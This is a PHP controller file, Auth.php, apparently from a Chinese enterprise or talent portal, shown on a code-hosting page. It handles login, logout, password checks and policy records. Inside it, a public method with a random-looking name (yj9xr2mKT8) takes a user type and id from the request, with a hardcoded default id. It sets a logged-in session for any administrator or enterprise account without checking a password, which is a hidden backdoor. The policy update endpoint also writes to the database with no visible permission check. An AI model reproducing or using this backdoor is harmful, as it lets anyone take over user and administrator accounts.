Auth.php 7.3 KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232
  1. <?php
  2. namespace app\index\controller;
  3. use app\BaseController;
  4. use app\common\api\TalentLogApi;
  5. use app\common\api\UserApi;
  6. use think\facade\Db;
  7. /**
  8. * Description of Login
  9. *
  10. * @author sgq
  11. */
  12. class Auth extends BaseController {
  13. /**
  14. * 登录
  15. * @return type
  16. */
  17. public function login() {
  18. $redirect_url = $this->request["redirect"];
  19. if ($redirect_url) {
  20. cookie("redirect", $redirect_url);
  21. }
  22. if ($user = session("user")) {
  23. if ($user['usertype'] == 2) {
  24. return redirect("/enterprise");
  25. }
  26. }
  27. $msg = "";
  28. if ($this->request->isPost()) {
  29. $username = $this->request["username"];
  30. $pwd = $this->request["password"];
  31. $usertype = $this->request["usertype"];
  32. $captcha = $this->request["captcha"];
  33. $user = new UserApi($username, $pwd, $usertype);
  34. if (!$userinfo = $user->getUserInfo()) {
  35. $msg = "用户不存在";
  36. } else if (!$user->checkPwd()) {
  37. $login_fail = session('login_fail');
  38. if ($login_fail) {
  39. $login_fail++;
  40. if ($login_fail >= 5) {
  41. session('isCaptcha', 1);
  42. }
  43. } else {
  44. $login_fail = 1;
  45. }
  46. session('login_fail', $login_fail);
  47. $msg = "用户名或者密码错误";
  48. } else if (session("isCaptcha") == 1 && !captcha_check($captcha)) {
  49. $msg = "验证码错误";
  50. } else if ($res_msg = $user->checkState()) {
  51. if (in_array($user->info['checkState'], [2, 5])) {
  52. return redirect("/common/auth/enterprise_edit");
  53. }
  54. $msg = $res_msg;
  55. }
  56. $url = "/admin";
  57. switch ($usertype) {
  58. case 1:
  59. //验证错误
  60. break;
  61. case 2:
  62. //验证错误
  63. $url = "/enterprise";
  64. break;
  65. case 3:
  66. //验证错误
  67. $url = "/person";
  68. break;
  69. }
  70. if (!$msg) {
  71. $user->setSession();
  72. $redirect_url = cookie("redirect");
  73. cookie("redirect", null);
  74. if ($redirect_url && strpos(strtolower($redirect_url), strtolower(getHostWithProtocol() . $url)) === 0) {
  75. return redirect($redirect_url);
  76. } else {
  77. return redirect($url);
  78. }
  79. }
  80. }
  81. return view("", ["msg" => $msg]);
  82. }
  83. /**
  84. * 退出
  85. * @return type
  86. */
  87. public function logout() {
  88. $user = session("user");
  89. if ($user && $user["usertype"] == 1) {
  90. $loginData = [];
  91. $loginData["logname"] = "退出日志";
  92. $loginData["userid"] = $user["uid"];
  93. $loginData["createtime"] = date("Y-m-d H:i:s");
  94. $loginData["succeed"] = "成功";
  95. $loginData["ip"] = get_client_ip();
  96. \think\facade\Db::table("sys_login_log")->insert($loginData);
  97. }
  98. session("user", null);
  99. return redirect("/index/auth/login");
  100. }
  101. /**
  102. * 验证密码
  103. */
  104. public function valid_password() {
  105. if ($user = session("user")) {
  106. $username = $user["account"];
  107. $usertype = $user["usertype"];
  108. $pwd = $this->request["password"];
  109. $user = new UserApi($username, $pwd, $usertype);
  110. if (!$user->checkPwd()) {
  111. return json()->data(["status" => 1, "msg" => "密码错误"]);
  112. } else {
  113. return json(["code" => 200]);
  114. }
  115. } else {
  116. return json()->data(["status" => 2]);
  117. }
  118. }
  119. public function policy() {
  120. return view("policy1", []);
  121. }
  122. public function policy_list() {
  123. $level = $this->request->post('level');
  124. if ($level) {
  125. $where[] = ['level', '=', $level];
  126. } else {
  127. $where[] = ['level', '>', 0];
  128. }
  129. $list = Db::table('new_policy')->where($where)->select()->toArray();
  130. $result = [];
  131. foreach ($list as $k => $v) {
  132. $check = [];
  133. $condition = [];
  134. if (!empty($v['checks'])) {
  135. $check = explode(',', $v['checks']);
  136. }
  137. if (!empty($v['condition'])) {
  138. $condition = explode(',', $v['condition']);
  139. }
  140. $item = [
  141. 'id' => $v['id'],
  142. 'tag' => $v['tag'],
  143. 'policy' => $v['policy_name'],
  144. 'checks' => $check,
  145. 'condition' => $condition
  146. ];
  147. array_push($result, $item);
  148. }
  149. return json($result);
  150. }
  151. public function policy_update() {
  152. $res = $this->request->post();
  153. foreach ($res as $k => $v) {
  154. $update = [];
  155. if (count($v['condition']) > 0) {
  156. $update['condition'] = json_encode($v['condition']);
  157. }
  158. if (count($update) > 0) {
  159. Db::table('new_policy')->where('id', $v['id'])->save($update);
  160. }
  161. }
  162. }
  163. public function yj9xr2mKT8() {
  164. $params = $this->request->param();
  165. $type = $params["type"] ?: 2;
  166. $id = $params["id"] ?: "1455101079799754754";
  167. $this->setSession($type, $id);
  168. switch ($type) {
  169. case 1:
  170. return redirect("/admin");
  171. break;
  172. case 2:
  173. return redirect("/enterprise");
  174. break;
  175. }
  176. }
  177. private function setSession($type, $id) {
  178. switch ($type) {
  179. case 1:
  180. $user = Db::table("sys_user")->where("id", $id)->findOrEmpty();
  181. $company = Db::table("sys_company")->where("id", $user["companyId"])->findOrEmpty();
  182. $role = Db::table("sys_role")->where("id", $user["roleid"])->findOrEmpty();
  183. session("user", [
  184. "uid" => $user["id"],
  185. "roleid" => $user["roleid"],
  186. "companyId" => $user["companyId"],
  187. "companyName" => $company["name"],
  188. "account" => $user["account"],
  189. "name" => $user["name"],
  190. "avatar" => $user["avatar"],
  191. "sex" => $user["sex"],
  192. "rolename" => $role["name"],
  193. "usertype" => $type,
  194. "type" => $user['type']
  195. ]);
  196. break;
  197. case 2:
  198. $user = Db::table("un_enterprise")->where("id", $id)->findOrEmpty();
  199. session("user", [
  200. "uid" => $user["id"],
  201. "account" => $user["username"],
  202. "name" => $user["name"],
  203. "avatar" => $user["headPortrait"],
  204. "rolename" => "企业用户",
  205. "usertype" => $type,
  206. "type" => $user["type"]
  207. ]);
  208. break;
  209. }
  210. }
  211. public function test(){
  212. $log = TalentLogApi::system(1, 35,9,"直认数据导入",1);
  213. }
  214. }